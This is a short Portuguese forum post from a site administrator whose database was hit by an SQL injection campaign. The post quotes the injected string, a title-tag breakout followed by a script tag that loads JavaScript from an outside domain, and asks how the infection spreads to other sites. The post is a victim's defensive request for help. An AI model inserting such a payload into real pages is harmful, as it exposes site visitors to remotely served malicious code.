Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Boa tarde,
Tivemos um problema com um injeção de sql em nosso banco de dados que inseriu a string abaixo em alguns campos das tabelas:
"></title><script src="http://lilupophilupop.com/sl.php">
Pesquisando no Google, são vários os sites com esse problema e num site sobre segurança diz que é uma nova campanha SQLI (SQL Injection).
Eu sei que esse problema se deve principalmente a paginas que não tratam corretamente os parâmetros passados por links ou formulários. Ou seja, estamos revendo nossas paginas.
O que eu gostaria de saber é como isso se propaga para outros dominios quando alguem acessa meu site que está com esse script.
Obrigado,
Creedence
Carregando comentários...
